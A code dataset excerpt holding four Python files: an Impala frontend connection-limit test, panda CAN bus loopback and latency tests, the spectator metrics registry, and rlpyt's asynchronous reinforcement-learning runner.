source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
test_frontend_connection_limit.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pytest
from threading import Thread
from tests.common.custom_cluster_test_suite import CustomClusterTestSuite
from tests.beeswax.impala_beeswax import ImpalaBeeswaxException
# This custom cluster test exercises the behavior of the front end thrift
# server on how a new client connection request is handled, after the maximum
# number of front end service threads (--fe_service_threads) has been
# allocated. If "--accepted_client_cnxn_timeout" > 0, new connection
# requests are rejected if they wait in the accepted queue for more than the
# the specified timeout.
# See IMPALA-7800.
class TestFrontendConnectionLimit(CustomClusterTestSuite):
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestFrontendConnectionLimit, cls).add_test_dimensions()
def _connect_and_query(self, query, impalad):
client = impalad.service.create_beeswax_client()
try:
client.execute(query)
except Exception as e:
client.close()
raise ImpalaBeeswaxException(e.message)
client.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--fe_service_threads=1 --accepted_client_cnxn_timeout=0")
def test_no_connection_is_rejected(self):
""" IMPALA-7800: New connection request should not be rejected if
--accepted_client_cnxn_timeout=0"""
query = "select sleep(2000)"
impalad = self.cluster.get_any_impalad()
q1 = Thread(target=self._connect_and_query, args=(query, impalad,))
q2 = Thread(target=self._connect_and_query, args=(query, impalad,))
q1.start()
q2.start()
q1.join()
q2.join()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--fe_service_threads=1 --accepted_client_cnxn_timeout=5000")
def test_server_busy(self):
""" IMPALA-7800: Reject new incoming connections if --accepted_client_cnxn_timeout > 0
and the request spent too much time waiting in the accepted queue."""
client = self.create_impala_client()
client.execute_async("select sleep(7000)")
# This step should fail to open a session.
# create_impala_client() does not throw an error on connection failure
# The only way to detect the connection is invalid is to perform a
# query in it
client1 = self.create_impala_client()
caught_exception = False
try:
client1.execute("select sleep(8000)")
except Exception:
caught_exception = True
client.close()
assert caught_exception, 'Query on client1 did not fail as expected'
|
7_can_loopback.py
|
import os
import time
import random
import threading
from panda import Panda
from nose.tools import assert_equal, assert_less, assert_greater
from .helpers import panda_jungle, start_heartbeat_thread, reset_pandas, time_many_sends, test_all_pandas, test_all_gen2_pandas, clear_can_buffers, panda_connect_and_init
# Reset the pandas before running tests
def aaaa_reset_before_tests():
reset_pandas()
@test_all_pandas
@panda_connect_and_init
def test_send_recv(p):
def test(p_send, p_recv):
p_send.set_can_loopback(False)
p_recv.set_can_loopback(False)
p_send.can_send_many([(0x1ba, 0, b"message", 0)]*2)
time.sleep(0.05)
p_recv.can_recv()
p_send.can_recv()
busses = [0,1,2]
for bus in busses:
for speed in [100, 250, 500, 750, 1000]:
p_send.set_can_speed_kbps(bus, speed)
p_recv.set_can_speed_kbps(bus, speed)
time.sleep(0.05)
clear_can_buffers(p_send)
clear_can_buffers(p_recv)
comp_kbps = time_many_sends(p_send, bus, p_recv, two_pandas=True)
saturation_pct = (comp_kbps/speed) * 100.0
assert_greater(saturation_pct, 80)
assert_less(saturation_pct, 100)
print("two pandas bus {}, 100 messages at speed {:4d}, comp speed is {:7.2f}, percent {:6.2f}".format(bus, speed, comp_kbps, saturation_pct))
# Start heartbeat
start_heartbeat_thread(p)
# Set safety mode and power saving
p.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
p.set_power_save(False)
try:
# Run tests in both directions
test(p, panda_jungle)
test(panda_jungle, p)
except Exception as e:
# Raise errors again, we don't want them to get lost
raise e
finally:
# Set back to silent mode
p.set_safety_mode(Panda.SAFETY_SILENT)
@test_all_pandas
@panda_connect_and_init
def test_latency(p):
def test(p_send, p_recv):
p_send.set_can_loopback(False)
p_recv.set_can_loopback(False)
p_send.set_can_speed_kbps(0, 100)
p_recv.set_can_speed_kbps(0, 100)
time.sleep(0.05)
p_send.can_send_many([(0x1ba, 0, b"testmsg", 0)]*10)
time.sleep(0.05)
p_recv.can_recv()
p_send.can_recv()
busses = [0,1,2]
for bus in busses:
for speed in [100, 250, 500, 750, 1000]:
p_send.set_can_speed_kbps(bus, speed)
p_recv.set_can_speed_kbps(bus, speed)
time.sleep(0.1)
# clear can buffers
clear_can_buffers(p_send)
clear_can_buffers(p_recv)
latencies = []
comp_kbps_list = []
saturation_pcts = []
num_messages = 100
for i in range(num_messages):
st = time.time()
p_send.can_send(0x1ab, b"message", bus)
r = []
while len(r) < 1 and (time.time() - st) < 5:
r = p_recv.can_recv()
et = time.time()
r_echo = []
while len(r_echo) < 1 and (time.time() - st) < 10:
r_echo = p_send.can_recv()
if len(r) == 0 or len(r_echo) == 0:
print("r: {}, r_echo: {}".format(r, r_echo))
assert_equal(len(r),1)
assert_equal(len(r_echo),1)
et = (et - st)*1000.0
comp_kbps = (1+11+1+1+1+4+8*8+15+1+1+1+7) / et
latency = et - ((1+11+1+1+1+4+8*8+15+1+1+1+7) / speed)
assert_less(latency, 5.0)
saturation_pct = (comp_kbps/speed) * 100.0
latencies.append(latency)
comp_kbps_list.append(comp_kbps)
saturation_pcts.append(saturation_pct)
average_latency = sum(latencies)/num_messages
assert_less(average_latency, 1.0)
average_comp_kbps = sum(comp_kbps_list)/num_messages
average_saturation_pct = sum(saturation_pcts)/num_messages
print("two pandas bus {}, {} message average at speed {:4d}, latency is {:5.3f}ms, comp speed is {:7.2f}, percent {:6.2f}"\
.format(bus, num_messages, speed, average_latency, average_comp_kbps, average_saturation_pct))
# Start heartbeat
start_heartbeat_thread(p)
# Set safety mode and power saving
p.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
p.set_power_save(False)
try:
# Run tests in both directions
test(p, panda_jungle)
test(panda_jungle, p)
except Exception as e:
# Raise errors again, we don't want them to get lost
raise e
finally:
# Set back to silent mode
p.set_safety_mode(Panda.SAFETY_SILENT)
@test_all_gen2_pandas
@panda_connect_and_init
def test_gen2_loopback(p):
def test(p_send, p_recv):
for bus in range(4):
obd = False
if bus == 3:
obd = True
bus = 1
# Clear buses
clear_can_buffers(p_send)
clear_can_buffers(p_recv)
# Send a random string
addr = random.randint(1, 2000)
string = b"test"+os.urandom(4)
p_send.set_obd(obd)
p_recv.set_obd(obd)
time.sleep(0.2)
p_send.can_send(addr, string, bus)
time.sleep(0.2)
content = p_recv.can_recv()
# Check amount of messages
assert len(content) == 1
# Check content
assert content[0][0] == addr and content[0][2] == string
# Check bus
assert content[0][3] == bus
print("Bus:", bus, "OBD:", obd, "OK")
# Start heartbeat
start_heartbeat_thread(p)
# Set safety mode and power saving
p.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
p.set_power_save(False)
try:
# Run tests in both directions
test(p, panda_jungle)
test(panda_jungle, p)
except Exception as e:
# Raise errors again, we don't want them to get lost
raise e
finally:
# Set back to silent mode
p.set_safety_mode(Panda.SAFETY_SILENT)
@test_all_pandas
@panda_connect_and_init
def test_bulk_write(p):
# The TX buffers on pandas is 0x100 in length.
NUM_MESSAGES_PER_BUS = 10000
def flood_tx(panda):
print('Sending!')
msg = b"\xaa"*4
packet = [[0xaa, None, msg, 0], [0xaa, None, msg, 1], [0xaa, None, msg, 2]] * NUM_MESSAGES_PER_BUS
# Disable timeout
panda.can_send_many(packet, timeout=0)
print(f"Done sending {3*NUM_MESSAGES_PER_BUS} messages!")
# Start heartbeat
start_heartbeat_thread(p)
# Set safety mode and power saving
p.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
p.set_power_save(False)
# Start transmisson
threading.Thread(target=flood_tx, args=(p,)).start()
# Receive as much as we can in a few second time period
rx = []
old_len = 0
start_time = time.time()
while time.time() - start_time < 2 or len(rx) > old_len:
old_len = len(rx)
rx.extend(panda_jungle.can_recv())
print(f"Received {len(rx)} messages")
# All messages should have been received
if len(rx) != 3*NUM_MESSAGES_PER_BUS:
Exception("Did not receive all messages!")
# Set back to silent mode
p.set_safety_mode(Panda.SAFETY_SILENT)
|
registry.py
|
import logging
import math
import sys
import threading
from spectator.clock import SystemClock
from spectator.counter import Counter, NoopCounter
from spectator.distsummary import DistributionSummary, NoopDistributionSummary
from spectator.gauge import Gauge, NoopGauge
from spectator.http import HttpClient
from spectator.id import MeterId
from spectator.timer import Timer, NoopTimer
logger = logging.getLogger("spectator.Registry")
try:
from spectatorconfig import default_config
defaultConfig = default_config()
logger.debug("loaded default config: %s", defaultConfig)
except:
defaultConfig = {}
class Registry:
noopGauge = NoopGauge()
noopCounter = NoopCounter()
noopDistributionSummary = NoopDistributionSummary()
noopTimer = NoopTimer()
addOp = 0
maxOp = 10
counterStats = {"count", "totalAmount", "totalTime",
"totalOfSquares", "percentile"}
def __init__(self, clock=SystemClock()):
self._clock = clock
self._lock = threading.RLock()
self._meters = {}
self._started = False
def clock(self):
return self._clock
def _new_meter(self, name, tags, meterFactory, meterCls, defaultIns):
with self._lock:
if tags is None:
tags = {}
meterId = MeterId(name, tags)
meter = self._meters.get(meterId, None)
if meter is None:
meter = meterFactory(meterId)
self._meters[meterId] = meter
elif not isinstance(meter, meterCls):
logger.warning("Meter is already defined as type %s. "
"Please use a unique name or tags",
meter.__class__.__name__)
return defaultIns
return meter
def counter(self, name, tags=None):
return self._new_meter(name, tags, lambda id: Counter(id), Counter,
self.noopCounter)
def timer(self, name, tags=None):
return self._new_meter(name, tags, lambda id: Timer(id, self._clock),
Timer, self.noopTimer)
def distribution_summary(self, name, tags=None):
return self._new_meter(name, tags, lambda id: DistributionSummary(id),
DistributionSummary,
self.noopDistributionSummary)
def gauge(self, name, tags=None):
return self._new_meter(name, tags, lambda id: Gauge(id, self._clock), Gauge,
self.noopGauge)
def __iter__(self):
with self._lock:
return RegistryIterator(self._meters.values())
def start(self, config=None):
if self._started:
logger.debug("registry already started")
return RegistryStopper(None)
else:
self._started = True
logger.info("starting registry")
if config is None:
logger.info("config not specified, using default")
config = defaultConfig
elif type(config) is not dict:
logger.warning("invalid config specified, using default")
config = defaultConfig
frequency = config.get("frequency", 5.0)
self._uri = config.get("uri", None)
self._batch_size = config.get("batch_size", 10000)
self._common_tags = config.get("common_tags", {})
self._client = HttpClient(self, config.get("timeout", 1))
self._timer = RegistryTimer(frequency, self._publish)
self._timer.start()
logger.debug("registry started with config: %s", config)
return RegistryStopper(self)
def clear_meters_and_start(self):
"""
This is called after a fork in the child process
to clear the cloned `_meters` and prevent duplicates
(the `_meters` are copied with the process
during the forking)
"""
self._meters = {}
self.start()
def stop_without_publish(self):
"""
This is called before a fork to prevent a potential deadlock.
It cancels the background timer thread. After the fork, the timer
thread is restarted in the main and cloned processes.
"""
if self._started:
self._timer.cancel()
self._started = False
def stop(self):
self.stop_without_publish()
# Even if not started, attempt to flush data to minimize risk
# of data loss
self._publish(disable_logging=True)
def _get_measurements(self):
"""
If there are no references in user code, then we expect four references to a meter:
1) meters map,
2) local variable in the for loop,
3) internal to ref count method, and
4) internal to the garbage collector.
"""
snapshot = []
with self._lock:
for k, m in list(self._meters.items()):
if sys.getrefcount(m) == 4:
if m.__class__.__name__ == 'Gauge':
if m._has_expired():
del self._meters[k]
else:
del self._meters[k]
ms = m._measure()
for id, value in ms.items():
if self._should_send(id, value):
snapshot.append((id, value))
return snapshot
def _send_batch(self, batch, disable_logging=False):
json = self._measurements_to_json(batch)
self._client.post_json(self._uri, json, disable_logging)
def _publish(self, disable_logging=False):
snapshot = self._get_measurements()
if not disable_logging and logger.isEnabledFor(logging.DEBUG):
for id, value in snapshot:
logger.debug("reporting: %s => %f", id, value)
if self._uri is not None:
i = 0
while i < len(snapshot):
end = min(i + self._batch_size, len(snapshot))
self._send_batch(snapshot[i:end])
i += self._batch_size
def _should_send(self, id, value):
max_op = 10
op = self._operation(id.tags())
return not math.isnan(value) and (value > 0 or op == max_op)
def _build_string_table(self, payload, data):
strings = {'name': 0}
for k, v in self._common_tags.items():
strings[k] = 0
strings[v] = 0
for id, _ in data:
strings[id.name] = 0
for k, v in id.tags().items():
strings[k] = 0
strings[v] = 0
keys = list(strings.keys())
keys.sort()
payload.append(len(keys))
payload.extend(keys)
for i, k in enumerate(keys):
strings[k] = i
return strings
def _measurements_to_json(self, data):
payload = []
strings = self._build_string_table(payload, data)
for id, v in data:
self._append_measurement(strings, payload, id, v)
return payload
def _append_measurement(self, strings, payload, id, value):
tags = id.tags()
op = self._operation(tags)
common_tags = self._common_tags
payload.append(len(tags) + 1 + len(common_tags))
for k, v in common_tags.items():
payload.append(strings[k])
payload.append(strings[v])
for k, v in tags.items():
payload.append(strings[k])
payload.append(strings[v])
payload.append(strings["name"])
payload.append(strings[id.name])
payload.append(op)
payload.append(value)
def _operation(self, tags):
if tags.get('statistic') in self.counterStats:
return self.addOp
else:
return self.maxOp
class RegistryTimer:
def __init__(self, frequency, function):
self._frequency = frequency
self._function = function
self._cancelled = threading.Event()
self._thread = threading.Thread(target=self._run)
self._thread.daemon = True
def _run(self):
while not self._cancelled.wait(self._frequency):
try:
self._function()
except:
e = sys.exc_info()[0]
logger.exception("registry polling failed: %s", e)
def start(self):
self._thread.start()
def cancel(self):
self._cancelled.set()
self._thread.join()
class RegistryStopper:
def __init__(self, registry):
self._registry = registry
def __enter__(self):
pass
def __exit__(self, typ, value, traceback):
if self._registry is not None:
self._registry.stop()
class RegistryIterator:
def __init__(self, meters):
self._meters = list(meters)
self._pos = 0
def next(self):
# needed to work on 2.7
return self.__next__()
def __next__(self):
if self._pos < len(self._meters):
pos = self._pos
self._pos += 1
return self._meters[pos]
else:
raise StopIteration
|
async_rl.py
|
import time
import multiprocessing as mp
import psutil
import torch
from collections import deque
import math
from rlpyt.runners.base import BaseRunner
from rlpyt.utils.quick_args import save__init__args
from rlpyt.utils.logging import logger
from rlpyt.utils.collections import AttrDict
from rlpyt.utils.seed import set_seed, make_seed
from rlpyt.utils.prog_bar import ProgBarCounter
from rlpyt.utils.synchronize import drain_queue, find_port
THROTTLE_WAIT = 0.05
class AsyncRlBase(BaseRunner):
"""
Runs sampling and optimization asynchronously in separate Python
processes. May be useful to achieve higher hardware utilization, e.g.
CPUs fully busy simulating the environment while GPU fully busy training
the agent (there's no reason to use this CPU-only). This setup is
significantly more complicated than the synchronous (single- or multi-GPU)
runners, requires use of the asynchronous sampler, and may require special
methods in the algorithm.
Further parallelization within the sampler and optimizer are independent.
The asynchronous sampler can be serial, cpu-parallel, gpu-parallel, or
multi-gpu-parallel. The optimizer can be single- or multi-gpu.
The algorithm must initialize a replay buffer on OS shared memory. The
asynchronous sampler will allocate minibatch buffers on OS shared memory,
and yet another Python process is run to copy the completed minibatches
over to the algorithm's replay buffer. While that memory copy is
underway, the sampler immediately begins gathering the next minibatch.
Care should be taken to balance the rate at which the algorithm runs against
the rate of the sampler, as this can affect learning performance. In the existing
implementations, the sampler runs at full speed, and the algorithm may be throttled
not to exceed the specified relative rate. This is set by the algorithm's ``replay_ratio``,
which becomes the upper bound on the amount of training samples used in ratio with
the amount of samples generated. (In synchronous mode, the replay ratio is enforced
more precisely by running a fixed batch size and number of updates per iteration.)
The master process runs the (first) training GPU and performs all logging.
Within the optimizer, one agent exists. If multi-GPU, the same parameter
values are copied across all GPUs, and PyTorch's DistributedDataParallel
is used to all-reduce gradients (as in the synchronous multi-GPU runners).
Within the sampler, one agent exists. If new agent parameters are
available from the optimizer between sampler minibatches, then those
values are copied into the sampler before gathering the next minibatch.
Note:
The ``affinity`` argument should be a structure with ``sampler`` and
``optimizer`` attributes holding the respective hardware allocations.
Optimizer and sampler parallelization is determined from this.
"""
_eval = False
def __init__(
self,
algo,
agent,
sampler,
n_steps,
affinity,
seed=None,
log_interval_steps=1e5,
transfer=False, # Whether to transfer
transfer_arg=0., # Argument passed to transfer method
transfer_iter=150, # Iteration of training at which to transfer
transfer_timestep=0, # Overrides transfer_iter if not 0, timestep
):
n_steps = int(n_steps)
log_interval_steps = int(log_interval_steps)
save__init__args(locals())
def train(self):
"""
Run the optimizer in a loop. Check whether enough new samples have
been generated, and throttle down if necessary at each iteration. Log
at an interval in the number of sampler iterations, not optimizer
iterations.
"""
throttle_itr, delta_throttle_itr = self.startup()
throttle_time = 0.
sampler_itr = itr = 0
if self._eval:
while self.ctrl.sampler_itr.value < 1: # Sampler does eval first.
time.sleep(THROTTLE_WAIT)
traj_infos = drain_queue(self.traj_infos_queue, n_sentinel=1)
self.store_diagnostics(0, 0, traj_infos, ())
self.log_diagnostics(0, 0, 0)
log_counter = 0
while True: # Run until sampler hits n_steps and sets ctrl.quit=True.
logger.set_iteration(itr)
with logger.prefix(f"opt_itr #{itr} "):
while self.ctrl.sampler_itr.value < throttle_itr:
if self.ctrl.quit.value:
break
time.sleep(THROTTLE_WAIT)
throttle_time += THROTTLE_WAIT
if self.ctrl.quit.value:
break
if self.ctrl.opt_throttle is not None:
self.ctrl.opt_throttle.wait()
throttle_itr += delta_throttle_itr
opt_info = self.algo.optimize_agent(itr,
sampler_itr=self.ctrl.sampler_itr.value)
self.agent.send_shared_memory() # To sampler.
sampler_itr = self.ctrl.sampler_itr.value
traj_infos = (list() if self._eval else
drain_queue(self.traj_infos_queue))
self.store_diagnostics(itr, sampler_itr, traj_infos, opt_info)
if (sampler_itr // self.log_interval_itrs > log_counter):
if self._eval:
with self.ctrl.sampler_itr.get_lock():
traj_infos = drain_queue(self.traj_infos_queue, n_sentinel=1)
self.store_diagnostics(itr, sampler_itr, traj_infos, ())
self.log_diagnostics(itr, sampler_itr, throttle_time)
log_counter += 1
throttle_time = 0.
itr += 1
# Final log:
sampler_itr = self.ctrl.sampler_itr.value
traj_infos = drain_queue(self.traj_infos_queue)
if traj_infos or not self._eval:
self.store_diagnostics(itr, sampler_itr, traj_infos, ())
self.log_diagnostics(itr, sampler_itr, throttle_time)
self.shutdown()
def startup(self):
"""
Calls ``sampler.async_initialize()`` to get a double buffer for minibatches,
followed by ``algo.async_initialize()`` to get a replay buffer on shared memory,
then launches all workers (sampler, optimizer, memory copier).
"""
if self.seed is None:
self.seed = make_seed()
set_seed(self.seed)
double_buffer, examples = self.sampler.async_initialize(
agent=self.agent,
bootstrap_value=getattr(self.algo, "bootstrap_value", False),
traj_info_kwargs=self.get_traj_info_kwargs(),
seed=self.seed,
)
self.sampler_batch_size = self.sampler.batch_spec.size
self.world_size = len(self.affinity.optimizer)
n_itr = self.get_n_itr() # Number of sampler iterations.
replay_buffer = self.algo.async_initialize(
agent=self.agent,
sampler_n_itr=n_itr,
batch_spec=self.sampler.batch_spec,
mid_batch_reset=self.sampler.mid_batch_reset,
examples=examples,
world_size=self.world_size,
)
self.launch_workers(n_itr, double_buffer, replay_buffer)
throttle_itr, delta_throttle_itr = self.optim_startup()
return throttle_itr, delta_throttle_itr
def optim_startup(self):
"""
Sets the hardware affinity, moves the agent's model parameters onto
device and initialize data-parallel agent, if applicable. Computes
optimizer throttling settings.
"""
main_affinity = self.affinity.optimizer[0]
p = psutil.Process()
if main_affinity.get("set_affinity", True):
p.cpu_affinity(main_affinity["cpus"])
logger.log(f"Optimizer master CPU affinity: {p.cpu_affinity()}.")
torch.set_num_threads(main_affinity["torch_threads"])
logger.log(f"Optimizer master Torch threads: {torch.get_num_threads()}.")
self.agent.to_device(main_affinity.get("cuda_idx", None))
if self.world_size > 1:
self.agent.data_parallel()
self.algo.optim_initialize(rank=0)
throttle_itr = 1 + getattr(self.algo,
"min_steps_learn", 0) // self.sampler_batch_size
delta_throttle_itr = (self.algo.batch_size * self.world_size *
self.algo.updates_per_optimize / # (is updates_per_sync)
(self.sampler_batch_size * self.algo.replay_ratio))
self.initialize_logging()
return throttle_itr, delta_throttle_itr
def launch_workers(self, n_itr, double_buffer, replay_buffer):
self.traj_infos_queue = mp.Queue()
self.ctrl = self.build_ctrl(self.world_size)
self.launch_sampler(n_itr)
self.launch_memcpy(double_buffer, replay_buffer)
self.launch_optimizer_workers(n_itr)
def get_n_itr(self):
log_interval_itrs = max(self.log_interval_steps //
self.sampler_batch_size, 1)
n_itr = math.ceil(self.n_steps / self.log_interval_steps) * log_interval_itrs
self.log_interval_itrs = log_interval_itrs
self.n_itr = n_itr
# If we're transferring by timestep instead of iteration, round up to next iteration
if self.transfer_timestep:
self.transfer_iteration = int(-(-self.n_steps // self.itr_batch_size)) # Ceiling divide
logger.log(f"Running {n_itr} sampler iterations.")
return n_itr
def build_ctrl(self, world_size):
"""
Builds several parallel communication mechanisms for controlling the
workflow across processes.
"""
opt_throttle = (mp.Barrier(world_size) if world_size > 1 else
None)
return AttrDict(
quit=mp.Value('b', lock=True),
quit_opt=mp.RawValue('b'),
sample_ready=[mp.Semaphore(0) for _ in range(2)], # Double buffer.
sample_copied=[mp.Semaphore(1) for _ in range(2)],
sampler_itr=mp.Value('l', lock=True),
opt_throttle=opt_throttle,
eval_time=mp.Value('d', lock=True),
)
def launch_optimizer_workers(self, n_itr):
"""
If multi-GPU optimization, launches an optimizer worker for each GPU
and initializes ``torch.distributed.``
"""
if self.world_size == 1:
return
offset = self.affinity.optimizer[0].get("master_cpus", [0])[0]
port = find_port(offset=offset)
affinities = self.affinity.optimizer
runners = [AsyncOptWorker(
rank=rank,
world_size=self.world_size,
algo=self.algo,
agent=self.agent,
n_itr=n_itr,
affinity=affinities[rank],
seed=self.seed + 100,
ctrl=self.ctrl,
port=port,
) for rank in range(1, len(affinities))]
procs = [mp.Process(target=r.optimize, args=()) for r in runners]
for p in procs:
p.start()
torch.distributed.init_process_group(
backend="nccl",
rank=0,
world_size=self.world_size,
init_method=f"tcp://127.0.0.1:{port}",
)
self.optimizer_procs = procs
def launch_memcpy(self, sample_buffers, replay_buffer):
"""
Fork a Python process for each of the sampler double buffers. (It may
be overkill to use two separate processes here, may be able to simplify
to one and still get good performance.)
"""
procs = list()
for i in range(len(sample_buffers)): # (2 for double-buffer.)
ctrl = AttrDict(
quit=self.ctrl.quit,
sample_ready=self.ctrl.sample_ready[i],
sample_copied=self.ctrl.sample_copied[i],
)
procs.append(mp.Process(target=memory_copier,
args=(sample_buffers[i], self.algo.samples_to_buffer,
replay_buffer, ctrl)))
for p in procs:
p.start()
self.memcpy_procs = procs
def launch_sampler(self, n_itr):
target = run_async_sampler
kwargs = dict(
sampler=self.sampler,
affinity=self.affinity.sampler,
ctrl=self.ctrl,
traj_infos_queue=self.traj_infos_queue,
n_itr=n_itr,
)
if self._eval:
target = run_async_sampler_eval
kwargs["eval_itrs"] = self.log_interval_itrs
self.sampler_proc = mp.Process(target=target, kwargs=kwargs)
self.sampler_proc.start()
def shutdown(self):
self.pbar.stop()
logger.log("Master optimizer shutting down, joining sampler process...")
self.sampler_proc.join()
logger.log("Joining memory copiers...")
for p in self.memcpy_procs:
p.join()
if self.ctrl.opt_throttle is not None:
logger.log("Joining optimizer processes...")
self.ctrl.quit_opt.value = True
self.ctrl.opt_throttle.wait()
for p in self.optimizer_procs:
p.join()
logger.log("All processes shutdown. Training complete.")
def initialize_logging(self):
self._opt_infos = {k: list() for k in self.algo.opt_info_fields}
self._start_time = self._last_time = time.time()
self._last_itr = 0
self._last_sampler_itr = 0
self._last_update_counter = 0
def get_itr_snapshot(self, itr, sampler_itr):
return dict(
itr=itr,
sampler_itr=sampler_itr,
cum_steps=sampler_itr * self.sampler_batch_size,
cum_updates=self.algo.update_counter,
agent_state_dict=self.agent.state_dict(),
optimizer_state_dict=self.algo.optim_state_dict(),
)
def save_itr_snapshot(self, itr, sample_itr):
logger.log("saving snapshot...")
params = self.get_itr_snapshot(itr, sample_itr)
logger.save_itr_params(itr, params)
logger.log("saved")
def get_traj_info_kwargs(self):
return dict(discount=getattr(self.algo, "discount", 1))
def store_diagnostics(self, itr, sampler_itr, traj_infos, opt_info):
self._traj_infos.extend(traj_infos)
for k, v in self._opt_infos.items():
new_v = getattr(opt_info, k, [])
v.extend(new_v if isinstance(new_v, list) else [new_v])
self.pbar.update((sampler_itr + 1) % self.log_interval_itrs)
def log_diagnostics(self, itr, sampler_itr, throttle_time, prefix='Diagnostics/'):
self.pbar.stop()
self.save_itr_snapshot(itr, sampler_itr)
new_time = time.time()
time_elapsed = new_time - self._last_time
new_updates = self.algo.update_counter - self._last_update_counter
new_samples = self.sampler.batch_size * (sampler_itr - self._last_sampler_itr)
updates_per_second = (float('nan') if itr == 0 else
new_updates / time_elapsed)
samples_per_second = (float('nan') if itr == 0 else
new_samples / time_elapsed)
if self._eval:
new_eval_time = self.ctrl.eval_time.value
eval_time_elapsed = new_eval_time - self._last_eval_time
non_eval_time_elapsed = time_elapsed - eval_time_elapsed
non_eval_samples_per_second = (float('nan') if itr == 0 else
new_samples / non_eval_time_elapsed)
self._last_eval_time = new_eval_time
cum_steps = sampler_itr * self.sampler.batch_size # No * world_size.
replay_ratio = (new_updates * self.algo.batch_size * self.world_size /
max(1, new_samples))
cum_replay_ratio = (self.algo.update_counter * self.algo.batch_size *
self.world_size / max(1, cum_steps))
with logger.tabular_prefix(prefix):
logger.record_tabular('Iteration', itr)
logger.record_tabular('SamplerIteration', sampler_itr)
logger.record_tabular('CumTime (s)', new_time - self._start_time)
logger.record_tabular('CumSteps', cum_steps)
logger.record_tabular('CumUpdates', self.algo.update_counter)
logger.record_tabular('ReplayRatio', replay_ratio)
logger.record_tabular('CumReplayRatio', cum_replay_ratio)
logger.record_tabular('StepsPerSecond', samples_per_second)
if self._eval:
logger.record_tabular('NonEvalSamplesPerSecond', non_eval_samples_per_second)
logger.record_tabular('UpdatesPerSecond', updates_per_second)
logger.record_tabular('OptThrottle', (time_elapsed - throttle_time) /
time_elapsed)
self._log_infos()
self._last_time = new_time
self._last_itr = itr
self._last_sampler_itr = sampler_itr
self._last_update_counter = self.algo.update_counter
logger.dump_tabular(with_prefix=False)
logger.log(f"Optimizing over {self.log_interval_itrs} sampler "
"iterations.")
self.pbar = ProgBarCounter(self.log_interval_itrs)
def _log_infos(self, traj_infos=None):
if traj_infos is None:
traj_infos = self._traj_infos
if traj_infos:
for k in traj_infos[0]:
if not k.startswith("_"):
logger.record_tabular_misc_stat(k,
[info[k] for info in traj_infos])
if self._opt_infos:
for k, v in self._opt_infos.items():
logger.record_tabular_misc_stat(k, v)
self._opt_infos = {k: list() for k in self._opt_infos} # (reset)
class AsyncRl(AsyncRlBase):
"""
Asynchronous RL with online agent performance tracking.
"""
def __init__(self, *args, log_traj_window=100, **kwargs):
super().__init__(*args, **kwargs)
self.log_traj_window = int(log_traj_window)
def initialize_logging(self):
self._traj_infos = deque(maxlen=self.log_traj_window)
self._cum_completed_trajs = 0
self._new_completed_trajs = 0
super().initialize_logging()
logger.log(f"Optimizing over {self.log_interval_itrs} sampler "
"iterations.")
self.pbar = ProgBarCounter(self.log_interval_itrs)
def store_diagnostics(self, itr, sampler_itr, traj_infos, opt_info):
self._cum_completed_trajs += len(traj_infos)
self._new_completed_trajs += len(traj_infos)
super().store_diagnostics(itr, sampler_itr, traj_infos, opt_info)
def log_diagnostics(self, itr, sampler_itr, throttle_time, prefix='Diagnostics/'):
with logger.tabular_prefix(prefix):
logger.record_tabular('CumCompletedTrajs', self._cum_completed_trajs)
logger.record_tabular('NewCompletedTrajs', self._new_completed_trajs)
logger.record_tabular('StepsInTrajWindow',
sum(info["Length"] for info in self._traj_infos))
super().log_diagnostics(itr, sampler_itr, throttle_time, prefix=prefix)
self._new_completed_trajs = 0
class AsyncRlEval(AsyncRlBase):
"""
Asynchronous RL with offline agent performance evaluation.
"""
_eval = True
def initialize_logging(self):
self._traj_infos = list()
self._last_eval_time = 0.
super().initialize_logging()
self.pbar = ProgBarCounter(self.log_interval_itrs)
def log_diagnostics(self, itr, sampler_itr, throttle_time, prefix='Diagnostics/'):
if not self._traj_infos:
logger.log("WARNING: had no complete trajectories in eval.")
steps_in_eval = sum([info["Length"] for info in self._traj_infos])
with logger.tabular_prefix(prefix):
logger.record_tabular('StepsInEval', steps_in_eval)
logger.record_tabular('TrajsInEval', len(self._traj_infos))
logger.record_tabular('CumEvalTime', self.ctrl.eval_time.value)
super().log_diagnostics(itr, sampler_itr, throttle_time, prefix=prefix)
self._traj_infos = list() # Clear after each eval.
###############################################################################
# Worker processes.
###############################################################################
class AsyncOptWorker:
def __init__(
self,
rank,
world_size,
algo,
agent,
n_itr,
affinity,
seed,
ctrl,
port
):
save__init__args(locals())
def optimize(self):
self.startup()
itr = 0
while True:
self.ctrl.opt_throttle.wait()
if self.ctrl.quit_opt.value:
break
self.algo.optimize_agent(itr, sampler_itr=self.ctrl.sampler_itr.value) # Leave un-logged.
itr += 1
self.shutdown()
def startup(self):
torch.distributed.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
init_method=f"tcp://127.0.0.1:{self.port}",
)
p = psutil.Process()
if self.affinity.get("set_affinity", True):
p.cpu_affinity(self.affinity["cpus"])
logger.log(f"Optimizer rank {self.rank} CPU affinity: {p.cpu_affinity()}.")
torch.set_num_threads(self.affinity["torch_threads"])
logger.log(f"Optimizer rank {self.rank} Torch threads: {torch.get_num_threads()}.")
logger.log(f"Optimizer rank {self.rank} CUDA index: "
f"{self.affinity.get('cuda_idx', None)}.")
set_seed(self.seed)
self.agent.to_device(cuda_idx=self.affinity.get("cuda_idx", None))
self.agent.data_parallel()
self.algo.optim_initialize(rank=self.rank)
def shutdown(self):
logger.log(f"Async optimization worker {self.rank} shutting down.")
